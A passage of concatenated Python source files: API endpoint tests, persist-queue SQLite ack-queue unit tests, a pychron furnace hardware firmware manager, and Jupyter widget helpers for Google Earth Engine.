headers={"Authorization": "Basic " + valid_credentials})
print('test_get_health_stats.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_get_health():
response = client.get("/health")
print('test_get_health.status_code:{}'.format(response.status_code))
assert response.status_code == 200
def test_get_help():
response = client.get("/help")
print('test_get_help.status_code:{}'.format(response.status_code))
assert response.status_code == 200
if __name__ == "__main__":
""" Health & stats """
test_get_help()
test_get_health()
test_get_health_stats()
""" Generic """
test_post_generic()
""" Azure """
test_post_azure_common()
""" GCP """
test_post_gcp()
""" AWS """
#test_post_aws()
|
test_sqlackqueue.py
|
# coding=utf-8
import random
import shutil
import sys
import tempfile
import unittest
from threading import Thread
from persistqueue.sqlackqueue import (
SQLiteAckQueue,
FILOSQLiteAckQueue,
UniqueAckQ)
from persistqueue import Empty
class SQLite3AckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='sqlackqueue')
self.auto_commit = True
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
def test_raise_empty(self):
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
q.put('first')
d = q.get()
self.assertEqual('first', d)
self.assertRaises(Empty, q.get, block=False)
# assert with timeout
self.assertRaises(Empty, q.get, block=True, timeout=1.0)
# assert with negative timeout
self.assertRaises(ValueError, q.get, block=True, timeout=-1.0)
def test_empty(self):
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
self.assertEqual(q.empty(), True)
q.put('first')
self.assertEqual(q.empty(), False)
q.get()
self.assertEqual(q.empty(), True)
def test_open_close_single(self):
"""Write 1 item, close, reopen checking if same item is there"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
q.put(b'var1')
del q
q = SQLiteAckQueue(self.path)
self.assertEqual(1, q.qsize())
self.assertEqual(b'var1', q.get())
def test_open_close_1000(self):
"""Write 1000 items, close, reopen checking if all items are there"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = SQLiteAckQueue(self.path)
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % i, data)
# assert adding another one still works
q.put('foobar')
data = q.get()
self.assertEqual('foobar', data)
def test_random_read_write(self):
"""Test random read/write"""
q = SQLiteAckQueue(self.path, auto_commit=self.auto_commit)
n = 0
for _ in range(1000):
if random.random() < 0.5:
if n > 0:
q.get()
n -= 1
else:
self.assertRaises(Empty, q.get, block=False)
else:
q.put('var%d' % random.getrandbits(16))
n += 1
def test_multi_threaded_parallel(self):
"""Create consumer and producer threads, check parallelism"""
# self.skipTest("Not supported multi-thread.")
m_queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer():
for i in range(1000):
m_queue.put('var%d' % i)
def consumer():
for i in range(1000):
x = m_queue.get(block=True)
self.assertEqual('var%d' % i, x)
c = Thread(target=consumer)
c.start()
p = Thread(target=producer)
p.start()
p.join()
c.join()
self.assertEqual(0, m_queue.size)
self.assertEqual(0, len(m_queue))
self.assertRaises(Empty, m_queue.get, block=False)
def test_multi_threaded_multi_producer(self):
"""Test sqlqueue can be used by multiple producers."""
queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer(seq):
for i in range(10):
queue.put('var%d' % (i + (seq * 10)))
def consumer():
for _ in range(100):
data = queue.get(block=True)
self.assertTrue('var' in data)
c = Thread(target=consumer)
c.start()
producers = []
for seq in range(10):
t = Thread(target=producer, args=(seq,))
t.start()
producers.append(t)
for t in producers:
t.join()
c.join()
def test_multiple_consumers(self):
"""Test sqlqueue can be used by multiple consumers."""
queue = SQLiteAckQueue(
path=self.path, multithreading=True,
auto_commit=self.auto_commit
)
def producer():
for x in range(1000):
queue.put('var%d' % x)
counter = []
# Set all to 0
for _ in range(1000):
counter.append(0)
def consumer(index):
for i in range(200):
data = queue.get(block=True)
self.assertTrue('var' in data)
counter[index * 200 + i] = data
p = Thread(target=producer)
p.start()
consumers = []
for index in range(5):
t = Thread(target=consumer, args=(index,))
t.start()
consumers.append(t)
p.join()
for t in consumers:
t.join()
self.assertEqual(0, queue.qsize())
for x in range(1000):
self.assertNotEqual(0, counter[x],
"not 0 for counter's index %s" % x)
def test_protocol_1(self):
shutil.rmtree(self.path, ignore_errors=True)
q = SQLiteAckQueue(path=self.path)
self.assertEqual(q._serializer.protocol,
2 if sys.version_info[0] == 2 else 4)
def test_protocol_2(self):
q = SQLiteAckQueue(path=self.path)
self.assertEqual(q._serializer.protocol,
2 if sys.version_info[0] == 2 else 4)
def test_ack_and_clear(self):
q = SQLiteAckQueue(path=self.path)
q._MAX_ACKED_LENGTH = 10
ret_list = []
for _ in range(100):
q.put("val%s" % _)
for _ in range(100):
ret_list.append(q.get())
for ret in ret_list:
q.ack(ret)
self.assertEqual(q.acked_count(), 100)
q.clear_acked_data()
self.assertEqual(q.acked_count(), 10)
def test_ack_unknown_item(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
val1 = q.get()
q.ack("val2")
q.nack("val3")
q.ack_failed("val4")
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
q.ack(val1)
self.assertEqual(q.unack_count(), 0)
def test_resume_unack(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
val1 = q.get()
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
self.assertEqual(q.ready_count(), 0)
del q
q = SQLiteAckQueue(path=self.path, auto_resume=False)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 1)
self.assertEqual(q.ready_count(), 0)
q.resume_unack_tasks()
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 0)
self.assertEqual(q.ready_count(), 1)
self.assertEqual(val1, q.get())
del q
q = SQLiteAckQueue(path=self.path, auto_resume=True)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 0)
self.assertEqual(q.ready_count(), 1)
self.assertEqual(val1, q.get())
def test_ack_unack_ack_failed(self):
q = SQLiteAckQueue(path=self.path)
q.put("val1")
q.put("val2")
q.put("val3")
val1 = q.get()
val2 = q.get()
val3 = q.get()
# qsize should be zero when all item is getted from q
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.unack_count(), 3)
# nack will let the item requeued as ready status
q.nack(val1)
self.assertEqual(q.qsize(), 1)
self.assertEqual(q.ready_count(), 1)
# ack failed is just mark item as ack failed
q.ack_failed(val3)
self.assertEqual(q.ack_failed_count(), 1)
# ack should not effect qsize
q.ack(val2)
self.assertEqual(q.acked_count(), 1)
self.assertEqual(q.qsize(), 1)
# all ack* related action will reduce unack count
self.assertEqual(q.unack_count(), 0)
# reget the nacked item
ready_val = q.get()
self.assertEqual(ready_val, val1)
q.ack(ready_val)
self.assertEqual(q.qsize(), 0)
self.assertEqual(q.acked_count(), 2)
self.assertEqual(q.ready_count(), 0)
def test_put_0(self):
q = SQLiteAckQueue(path=self.path)
q.put(0)
d = q.get(block=False)
self.assertIsNotNone(d)
class SQLite3QueueInMemory(SQLite3AckQueueTest):
def setUp(self):
self.path = ":memory:"
self.auto_commit = True
def test_open_close_1000(self):
self.skipTest('Memory based sqlite is not persistent.')
def test_open_close_single(self):
self.skipTest('Memory based sqlite is not persistent.')
def test_multiple_consumers(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_multi_threaded_multi_producer(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_multi_threaded_parallel(self):
self.skipTest('Skipped due to occasional crash during '
'multithreading mode.')
def test_task_done_with_restart(self):
self.skipTest('Skipped due to not persistent.')
def test_protocol_2(self):
self.skipTest('In memory queue is always new.')
def test_resume_unack(self):
self.skipTest('Memory based sqlite is not persistent.')
class FILOSQLite3AckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='filo_sqlackqueue')
self.auto_commit = True
def tearDown(self):
shutil.rmtree(self.path, ignore_errors=True)
def test_open_close_1000(self):
"""Write 1000 items, close, reopen checking if all items are there"""
q = FILOSQLiteAckQueue(self.path, auto_commit=self.auto_commit)
for i in range(1000):
q.put('var%d' % i)
self.assertEqual(1000, q.qsize())
del q
q = FILOSQLiteAckQueue(self.path)
self.assertEqual(1000, q.qsize())
for i in range(1000):
data = q.get()
self.assertEqual('var%d' % (999 - i), data)
# assert adding another one still works
q.put('foobar')
data = q.get()
self.assertEqual('foobar', data)
class SQLite3UniqueAckQueueTest(unittest.TestCase):
def setUp(self):
self.path = tempfile.mkdtemp(suffix='sqlackqueue')
self.auto_commit = True
def test_add_duplicate_item(self):
q = UniqueAckQ(self.path)
q.put(1111)
self.assertEqual(1, q.size)
# put duplicate item
q.put(1111)
self.assertEqual(1, q.size)
q.put(2222)
self.assertEqual(2, q.size)
del q
q = UniqueAckQ(self.path)
self.assertEqual(2, q.size)
|
manager.py
|
# ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
from __future__ import absolute_import
import json
import time
from threading import Thread, Event
import yaml
# ============= local library imports ==========================
from pychron.core.helpers.strtools import to_bool
from pychron.furnace.firmware import PARAMETER_REGISTRY, __version__
from pychron.hardware.arduino.rotary_dumper import RotaryDumper
from pychron.hardware.dht11 import DHT11
from pychron.hardware.eurotherm.headless import HeadlessEurotherm
from pychron.hardware.gauges.granville_phillips.headless_micro_ion_controller import HeadlessMicroIonController
from pychron.hardware.labjack.headless_u3_lv import HeadlessU3LV
from pychron.hardware.mdrive.headless import HeadlessMDrive
from pychron.hardware.watlow.headless_ezzone import HeadlessWatlowEZZone
from pychron.headless_loggable import HeadlessLoggable
from pychron.image.rpi_camera import RPiCamera
from pychron.messaging.broadcaster import Broadcaster
from pychron.paths import paths
DEVICES = {'controller': HeadlessEurotherm,
'switch_controller': HeadlessU3LV,
'funnel': HeadlessMDrive,
'feeder': HeadlessMDrive,
'temp_hum': DHT11,
'camera': RPiCamera,
'first_stage_gauge': HeadlessMicroIonController,
'backside_furnace_gauge': HeadlessMicroIonController,
'bakeout1': HeadlessWatlowEZZone,
'bakeout2': HeadlessWatlowEZZone,
'rotary_dumper': RotaryDumper}
def debug(func):
def wrapper(obj, data):
# obj.debug('------ {}, data={}'.format(func.__name__, data))
r = func(obj, data)
# obj.debug('------ result={}'.format(r))
return r
return wrapper
class FirmwareManager(HeadlessLoggable):
controller = None
switch_controller = None
funnel = None
feeder = None
temp_hum = None
camera = None
rotary_dumper =None
_switch_mapping = None
_switch_indicator_mapping = None
_is_energized = False
_use_video_service = False
_use_broadcast_service = False
_broadcast_port = 9000
_start_time = 0
_broadcaster = None
_broadcast_stop_event = None
def bootstrap(self, **kw):
self._start_time = time.time()
p = paths.furnace_firmware
with open(p, 'r') as rfile:
yd = yaml.load(rfile)
self._load_config(yd['config'])
self._load_devices(yd['devices'])
self._load_switch_mapping(yd['switch_mapping'])
self._load_switch_indicator_mapping(yd['switch_indicator_mapping'])
self._load_funnel(yd['funnel'])
self._load_magnets(yd['magnets'])
self._load_rotary_dumper()
if self._use_broadcast_service:
self._broadcaster = Broadcaster()
self._broadcaster.setup(self._broadcaster_port)
self._broadcast_stop_event = Event()
t = Thread(target=self._broadcast, args=(self._broadcaster, self._broadcast_stop_event))
t.start()
if self._use_video_service:
# start camera
if self.camera:
self.camera.start_video_service()
# properties
@property
def furnace_env_humidity(self):
if self.temp_hum:
return self.temp_hum.humdity
@property
def furnace_env_temperature(self):
if self.temp_hum:
return self.temp_hum.temperature
@property
def furnace_setpoint(self):
return self.get_setpoint()
@property
def furnace_process_value(self):
return self.get_temperature()
@property
def feeder_position(self):
if self.feeder:
return self.feeder.position
@property
def funnel_position(self):
if self.funnel:
return self.funnel.position
# getters
# @debug
# def get_jpeg(self, data):
# quality = 100
# if isinstance(data, dict):
# quality = data['quality']
#
# memfile = StringIO()
# self.camera.capture(memfile, name=None, quality=quality)
# memfile.seek(0)
# return json.dumps(memfile.read())
#
# def get_image_array(self, data):
# if self.camera:
# im = self.camera.get_image_array()
# if im is not None:
# imstr = im.dumps()
# return '{:08X}{}'.format(len(imstr), imstr)
def get_heartbeat(self, data):
return '{},{}'.format(time.time(), self._start_time)
def get_furnace_summary(self, data):
h2o_channel = None
if isinstance(data, dict):
h2o_channel = data.get('h2o_channel')
s={}
if h2o_channel is not None:
s['h2o_state'] = self.switch_controller.get_channel_state(h2o_channel)
s['setpoint'] = self.get_setpoint(None)
s['response'] = self.get_temperature(None)
s['output'] = self.get_percent_output(None)
return json.dumps(s)
def get_percent_output(self, data):
if self.controller:
return self.controller.get_output()
def get_full_summary(self):
s = {'version': __version__}
for attr in ('furnace_env_humidity', 'furnace_env_temperature',
'furnace_setpoint', 'furnace_process_value',
'feeder_position', 'funnel_position'):
addr = PARAMETER_REGISTRY.get(attr)
if addr:
v = getattr(self, attr)
s[addr] = v
ss = []
for k in self._switch_mapping:
_, o, c = self.get_indicator_component_states(k)
rs = self.get_channel_state(k)
ss.append('{},s{},o{},c{}'.format(k, rs, o, c))
s[PARAMETER_REGISTRY.get('switch_status')] = ';'.join(ss)
return json.dumps(s)
@debug
def get_lab_humidity(self, data):
if self.temp_hum:
self.temp_hum.update()
return self.temp_hum.humdity
@debug
def get_lab_temperature(self, data):
if self.temp_hum:
self.temp_hum.update()
return self.temp_hum.temperature
@debug
def get_temperature(self, data):
if self.controller:
return self.controller.get_process_value()
@debug
def get_setpoint(self, data):
if self.controller:
return self.controller.process_setpoint
@debug
def get_magnets_state(self, data):
return 0
@debug
def get_position(self, data):
drive = self._get_drive(data)
if drive:
return drive.get_position()
@debug
def moving(self, data):
drive = self._get_drive(data)
if drive:
return drive.moving()
@debug
def is_funnel_down(self, data):
funnel = self.funnel
if funnel:
pos = funnel.read_position()
return abs(pos - self._funnel_down) < self._funnel_tolerance
@debug
def is_funnel_up(self, data):
funnel = self.funnel
if funnel:
pos = funnel.read_position()
return abs(pos - self._funnel_up) < self._funnel_tolerance
@debug
def get_channel_state(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
result = self.switch_controller.get_channel_state(ch)
if inverted:
result = not result
return result
@debug
def get_indicator_state(self, data):
if self.switch_controller:
args = self._get_indicator_info(data)
return args[0]
@debug
def get_indicator_component_states(self, data):
if self.switch_controller:
args = self._get_indicator_info(data)
return ','.join(args)
@debug
def get_di_state(self, data):
if self.switch_controller:
if isinstance(data, dict):
di = data['name']
else:
di = data
return self.switch_controller.get_channel_state(di)
@debug
def get_version(self, data):
return __version__
# setters
@debug
def set_frame_rate(self, data):
if self.camera:
self.camera.frame_rate = int(data)
@debug
def set_setpoint(self, data):
if self.controller:
if isinstance(data, dict):
sp = data.get('setpoint', 0)
else:
sp = float(data)
self.controller.process_setpoint = sp
return 'OK'
@debug
def open_switch(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
if ch:
self.switch_controller.set_channel_state(ch, False if inverted else True)
return 'OK'
@debug
def close_switch(self, data):
if self.switch_controller:
ch, inverted = self._get_switch_channel(data)
if ch:
self.switch_controller.set_channel_state(ch, True if inverted else False)
return 'OK'
@debug
def raise_funnel(self, data):
if self.funnel:
return self.funnel.move_absolute(self._funnel_up, block=False)
@debug
def lower_funnel(self, data):
if self.funnel:
return self.funnel.move_absolute(self._funnel_down, block=False)
@debug
def rotary_dumper_moving(self, data):
if self.rotary_dumper:
return self.rotary_dumper.is_moving()
@debug
def energize_magnets(self, data):
if self._magnet_channels:
if self.switch_controller:
period = 3
if data:
if isinstance(data, dict):
period = data.get('period', 3)
else:
period = data
def func():
self._is_energized = True
prev = None
for m in self._magnet_channels:
self.switch_controller.set_channel_state(m, True)
if prev:
self.switch_controller.set_channel_state(prev, False)
prev = m
time.sleep(period)
self.switch_controller.set_channel_state(prev, False)
self._is_energized = False
t = Thread(target=func)
t.start()
return True
else:
if self.rotary_dumper:
nsteps = None
rpm = None
if data:
if isinstance(data, dict):
nsteps = data.get('nsteps', 3)
rpm = data.get('rpm')
else:
nsteps = data
self._is_energized = True
self.rotary_dumper.energize(nsteps, rpm)
# while self.rotary_dumper.is_energized():
# time.sleep(0.5)
# self._is_energized = False
@debug
def is_energized(self, data):
return self._is_energized
@debug
def denergize_magnets(self, data):
self._is_energized = False
if self._magnet_channels:
if self.switch_controller:
for m in self._magnet_channels:
self.switch_controller.set_channel_state(m, False)
return True
else:
if self.rotary_dumper:
nsteps = None
if data:
if isinstance(data, dict):
nsteps = data.get('nsteps')
else:
nsteps = data
self.rotary_dumper.denergize(nsteps)
@debug
def move_absolute(self, data):
drive = self._get_drive(data)
if drive:
units = data.get('units', 'steps')
velocity = data.get('velocity')
return drive.move_absolute(data['position'], velocity=velocity, block=False, units=units)
@debug
def move_relative(self, data):
drive = self._get_drive(data)
if drive:
units = data.get('units', 'steps')
return drive.move_relative(data['position'], block=False, units=units)
@debug
def stop_drive(self, data):
drive = self._get_drive(data)
if drive:
return drive.stop_drive()
@debug
def set_home(self, data):
drive = self._get_drive(data)
if drive:
return drive.set_home()
@debug
def stalled(self, data):
drive = self._get_drive(data)
if drive:
return drive.stalled()
@debug
def slew(self, data):
drive = self._get_drive(data)
if drive:
scalar = data.get('scalar', 1.0)
return drive.slew(scalar)
@debug
def start_jitter(self, data):
drive = self._get_drive(data)
if drive:
turns = data.get('turns', 10)
p1 = data.get('p1', 0.1)
p2 = data.get('p2', 0.1)
velocity = data.get('velocity', None)
acceleration = data.get('acceleration', None)
deceleration = data.get('deceleration', None)
return drive.start_jitter(turns, p1, p2, velocity, acceleration, deceleration)
@debug
def stop_jitter(self, data):
drive = self._get_drive(data)
if drive:
return drive.stop_jitter()
@debug
def set_pid(self, data):
if isinstance(data, dict):
data = data['pid']
controller = self.controller
if controller:
return controller.set_pid_str(data)
@debug
def set_bakeout_setpoint(self, data):
controller = self._get_bakeout_controller(data)
if controller:
value = data['setpoint']
ret = controller.set_closed_loop_setpoint(value)
# set_closed_loop_setpoint returns true if request and actual setpoints are greater than 0.01 different,
# True == Failed to set setpoint
# None == Succeeded to setpoint
return 'OK' if not ret else 'Fail'
@debug
def get_bakeout_setpoint(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.read_closed_loop_setpoint()
@debug
def get_bakeout_temp_and_power(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.get_temp_and_power()
@debug
def set_bakeout_control_mode(self, data):
controller = self._get_bakeout_controller(data)
if controller:
if isinstance(data, dict):
mode = data['mode']
else:
mode = data
return controller.set_control_mode(mode)
@debug
def get_bakeout_temperature(self, data):
controller = self._get_bakeout_controller(data)
if controller:
return controller.get_temperature()
@debug
def get_gauge_pressure(self, data):
controller, channel = self._get_gauge_controller(data)
if controller:
return controller.get_pressure(channel, force=True)
# private
def _get_gauge_controller(self, data):
controller, channel = None, None
if isinstance(data, dict):
name = data['name']
else:
name, channel = data
try:
controller = getattr(self, name)
except AttributeError:
pass
return controller, channel
def _get_bakeout_controller(self, data):
channel = data['channel']
try:
controller = getattr(self, 'bakeout_controller{}'.format(channel))
except AttributeError:
return 'Invalid bakeout channel {}, data={}'.format(channel, data)
return controller
def _get_indicator_info(self, data):
if self.switch_controller:
if isinstance(data, dict):
alt_name = data['name']
else:
alt_name, _ = data
alt_ch, inverted = self._get_switch_channel(alt_name)
open_ch, close_ch, action = self._get_switch_indicator(data)
#print 'ffffffff {} {} {}'.format(data, open_ch, close_ch)
if open_ch=='inverted':
oresult = self.switch_controller.get_channel_state(alt_ch)
oresult = not oresult
else:
invert = False
if open_ch.startswith('i'):
open_ch = open_ch[1:]
invert = True
oresult = self.switch_controller.get_channel_state(open_ch)
#print 'gggggg {} {} {}'.format(invert, open_ch, oresult)
if invert:
oresult = not oresult
if close_ch is None:
#cresult = self.get_channel_state(alt_ch)
#if inverted:
# cresult = not cresult
cresult = None
else:
invert = False
if close_ch.startswith('i'):
close_ch = close_ch[1:]
invert = True
cresult = self.switch_controller.get_channel_state(close_ch)
if invert:
cresult = not cresult
result = oresult
if oresult == cresult:
result = 'Error: OpenIndicator={}, CloseIndicator={}'.format(oresult, cresult)
else:
#if inverted:
# result = not result
result = 'open' if result else 'closed'
#print 'result={}, oresult={}, cresult={}'.format(result, oresult, cresult)
return result, oresult, cresult
# oresult = None
# cresult = None
# if action == 'open' and open_ch is None:
# result = self.get_channel_state(alt_ch)
# else:
# oresult = False if action != 'open' else True
# if open_ch:
# oresult = self.switch_controller.get_channel_state(open_ch)
#
# cresult = True if action != 'open' else False
# if close_ch:
# cresult = self.switch_controller.get_channel_state(close_ch)
#
# if action == 'open':
# result = oresult and not cresult
# else:
# result = not oresult and cresult
#
# # if ch is None:
# # result = self.get_channel_state(alt_ch)
# # else:
# # result = self.switch_controller.get_channel_state(ch)
#
# self.debug('indicator state {}, invert={} Open Indicator={}, Close Indicator={}'.format(result, inverted,
# oresult,
# cresult))
# if inverted:
# result = not result
#
# if action == 'open' and result:
# result = 'open'
# else:
# result = 'closed'
#
# return result, oresult, cresult
def _get_drive(self, data):
drive = data.get('drive')
if drive:
try:
return getattr(self, drive)
except AttributeError:
pass
def _get_switch_channel(self, data):
if isinstance(data, dict):
name = data['name']
else:
name = data
name = str(name)
ch = self._switch_mapping.get(name, '')
inverted = False
if ',' in str(ch):
ch, inverted = ch.split(',')
inverted = to_bool(inverted)
#self.debug('get switch channel {} {}'.format(name, ch))
return ch, inverted
def _get_switch_indicator(self, data):
if isinstance(data, dict):
name = data['name']
action = data['action']
else:
name, action = data
close_ch = None
open_ch = self._switch_indicator_mapping.get(name)
#self.debug('get switch indicator channel {} {}'.format(name, open_ch))
if open_ch == 'inverted':
return open_ch, None, None
if ',' in str(open_ch):
def prep(ch):
ch = ch.strip()
if not ch or ch == '-':
ch = None
return ch
# open_ch, close_ch = list(map(prep, open_ch.split(',')))
open_ch, close_ch = [prep(ci) for ci in open_ch.split(',')]
return open_ch, close_ch, action
def _broadcast(self, bs, evt):
i = 0
while not evt.is_set():
if not i % 10:
bs.send_message(self.get_full_summary())
i = -1
else:
bs.send_message('HeartBeat {}'.format(time.time()))
i += 1
time.sleep(2)
# bootstrapping
def _load_config(self, cd):
self._use_video_service = cd.get('use_video_service', False)
bs = cd.get('broadcast', None)
if bs:
self._use_broadcast_service = bs.get('enabled')
self._broadcast_port = bs.get('port', 9000)
def _load_rotary_dumper(self):
pass
def _load_magnets(self, m):
self._magnet_channels = m
def _load_funnel(self, f):
if self.funnel:
self._funnel_down = self.funnel.tosteps(f['down'])
self._funnel_up = self.funnel.tosteps(f['up'])
self._funnel_tolerance = f['tolerance']
def _load_switch_mapping(self, m):
self._switch_mapping = m
def _load_switch_indicator_mapping(self, m):
self._switch_indicator_mapping = m
def _load_devices(self, devices):
for dev in devices:
self._load_device(dev)
def _load_device(self, devname):
self.debug('load device name={}'.format(devname))
klass = DEVICES.get(devname)
if klass:
dev = klass(name=devname, configuration_dir_name='furnace')
dev.bootstrap()
setattr(self, devname, dev)
else:
self.warning('Invalid device {}'.format(devname))
# ============= EOF =============================================
|
ipytools.py
|
# coding=utf-8
""" General tools for the Jupyter Notebook and Lab """
from ipywidgets import HTML, Tab, Accordion, Checkbox, HBox, Layout, Widget, \
VBox, Button, Box, ToggleButton, IntSlider, FloatText
from traitlets import List, Unicode, observe, Instance, Tuple, Int, Float
from .. import batch
# imports for async widgets
from threading import Thread
from multiprocessing import Pool
import time
# import EE
import ee
if not ee.data._initialized: ee.Initialize()
def create_accordion(dictionary):
""" Create an Accordion output from a dict object """
widlist = []
ini = 0
widget = Accordion()
widget.selected_index = None # this will unselect all
for key, val in dictionary.items():
if isinstance(val, dict):
newwidget = create_accordion(val)
widlist.append(newwidget)
elif isinstance(val, list):
# tranform list to a dictionary
dictval = {k: v for k, v in enumerate(val)}
newwidget = create_accordion(dictval)
widlist.append(newwidget)
else:
value = HTML(str(val))
widlist.append(value)
widget.set_title(ini, key)
ini += 1
widget.children = widlist
return widget
def create_object_output(object):
''' Create a output Widget for Images, Geometries and Features '''
ty = object.__class__.__name__
if ty == 'Image':
info = object.getInfo()
image_id = info['id'] if 'id' in info else 'No Image ID'
prop = info.get('properties')
bands = info.get('bands')
bands_names = [band.get('id') for band in bands]
# BAND PRECISION
bands_precision = []
for band in bands:
data = band.get('data_type')
if data:
precision = data.get('precision')
bands_precision.append(precision)
# BAND CRS
bands_crs = []
for band in bands:
crs = band.get('crs')
bands_crs.append(crs)
# BAND MIN AND MAX
bands_min = []
for band in bands:
data = band.get('data_type')
if data:
bmin = data.get('min')
bands_min.append(bmin)
bands_max = []
for band in bands:
data = band.get('data_type')
if data:
bmax = data.get('max')
bands_max.append(bmax)
# BANDS
new_band_names = []
zipped_data = zip(bands_names, bands_precision, bands_min, bands_max,
bands_crs)
for name, ty, mn, mx, epsg in zipped_data:
value = '<li><b>{}</b> ({}) {} to {} - {}</li>'.format(name,ty,
mn,mx,epsg)
new_band_names.append(value)
bands_wid = HTML('<ul>'+''.join(new_band_names)+'</ul>')
# PROPERTIES
if prop:
new_properties = []
for key, val in prop.items():
value = '<li><b>{}</b>: {}</li>'.format(key, val)
new_properties.append(value)
prop_wid = HTML('<ul>'+''.join(new_properties)+'</ul>')
else:
prop_wid = HTML('Image has no properties')
# ID
header = HTML('<b>Image id:</b> {id} </br>'.format(id=image_id))
acc = Accordion([bands_wid, prop_wid])
acc.set_title(0, 'Bands')
acc.set_title(1, 'Properties')
acc.selected_index = None # thisp will unselect all
return VBox([header, acc])
elif ty == 'FeatureCollection':
try:
info = object.getInfo()
except:
print('FeatureCollection limited to 4000 features')
info = object.limit(4000)
return create_accordion(info)
else:
info = object.getInfo()
return create_accordion(info)
def create_async_output(object, widget):
try:
child = create_object_output(object)
except Exception as e:
child = HTML('There has been an error: {}'.format(str(e)))
widget.children = [child]
# def recrusive_delete_asset_to_widget(assetId, widget):
def recrusive_delete_asset_to_widget(args):
''' adapted version to print streaming results in a widget '''
assetId = args[0]
widget = args[1]
try:
content = ee.data.getList({'id':assetId})
except Exception as e:
widget.value = str(e)
return
if content == 0:
# delete empty colletion and/or folder
ee.data.deleteAsset(assetId)
else:
for asset in content:
path = asset['id']
ty = asset['type']
if ty == 'Image':
ee.data.deleteAsset(path)
widget.value += 'deleting {} ({})</br>'.format(path, ty)
else:
# clear output
widget.value = ''
recrusive_delete_asset_to_widget(path, widget)
# delete empty colletion and/or folder
ee.data.deleteAsset(assetId)
class CheckRow(HBox):
checkbox = Instance(Checkbox)
widget = Instance(Widget)
def __init__(self, widget, **kwargs):
self.checkbox = Checkbox(indent=False,
layout=Layout(flex='1 1 20', width='auto'))
self.widget = widget
super(CheckRow, self).__init__(children=(self.checkbox, self.widget),
**kwargs)
self.layout = Layout(display='flex', flex_flow='row',
align_content='flex-start')
@observe('widget')
def _ob_wid(self, change):
new = change['new']
self.children = (self.checkbox, new)
def observe_checkbox(self, handler, extra_params={}, **kwargs):
""" set handler for the checkbox widget. Use the property 'widget' of
change to get the corresponding widget
:param handler: callback function
:type handler: function
:param extra_params: extra parameters that can be passed to the handler
:type extra_params: dict
:param kwargs: parameters from traitlets.observe
:type kwargs: dict
"""
# by default only observe value
name = kwargs.get('names', 'value')
def proxy_handler(handler):
def wrap(change):
change['widget'] = self.widget
for key, val in extra_params.items():
change[key] = val
return handler(change)
return wrap
self.checkbox.observe(proxy_handler(handler), names=name, **kwargs)
def observe_widget(self, handler, extra_params={}, **kwargs):
""" set handler for the widget alongside de checkbox
:param handler: callback function
:type handler: function
:param extra_params: extra parameters that can be passed to the handler
:type extra_params: dict
:param kwargs: parameters from traitlets.observe
:type kwargs: dict
"""
def proxy_handler(handler):
def wrap(change):
change['checkbox'] = self.checkbox
for key, val in extra_params.items():
change[key] = val
return handler(change)
return wrap
self.widget.observe(proxy_handler(handler), **kwargs)
class CheckAccordion(VBox):
widgets = Tuple()
def __init__(self, widgets, **kwargs):
# self.widgets = widgets
super(CheckAccordion, self).__init__(**kwargs)
self.widgets = widgets
@observe('widgets')
def _on_child(self, change):
new = change['new'] # list of any widget
newwidgets = []
for widget in new:
# constract the widget
acc = Accordion(children=(widget,))
acc.selected_index = None # this will unselect all
# create a CheckRow
checkrow = CheckRow(acc)
newwidgets.append(checkrow)
newchildren = tuple(newwidgets)
self.children = newchildren
def set_title(self, index, title):
''' set the title of the widget at indicated index'''
checkrow = self.children[index]
acc = checkrow.widget
acc.set_title(0, title)
def get_title(self, index):
''' get the title of the widget at indicated index'''
checkrow = self.children[index]
acc = checkrow.widget
return acc.get_title(0)
def get_check(self, index):
''' get the state of checkbox in index '''
checkrow = self.children[index]
return checkrow.checkbox.value
def set_check(self, index, state):
''' set the state of checkbox in index '''
checkrow = self.children[index]
checkrow.checkbox.value = state
def checked_rows(self):
''' return a list of indexes of checked rows '''
checked = []
for i, checkrow in enumerate(self.children):
state = checkrow.checkbox.value
if state: checked.append(i)
return checked
def get_widget(self, index):
''' get the widget in index '''
checkrow = self.children[index]
return checkrow.widget
def set_widget(self, index, widget):
''' set the widget for index '''
checkrow = self.children[index]
checkrow.widget.children = (widget,) # Accordion has 1 child
def set_row(self, index, title, widget):
''' set values for the row '''
self.set_title(index, title)
self.set_widget(index, widget)
def set_accordion_handler(self, index, handler, **kwargs):
''' set the handler for Accordion in index '''
checkrow = self.children[index]
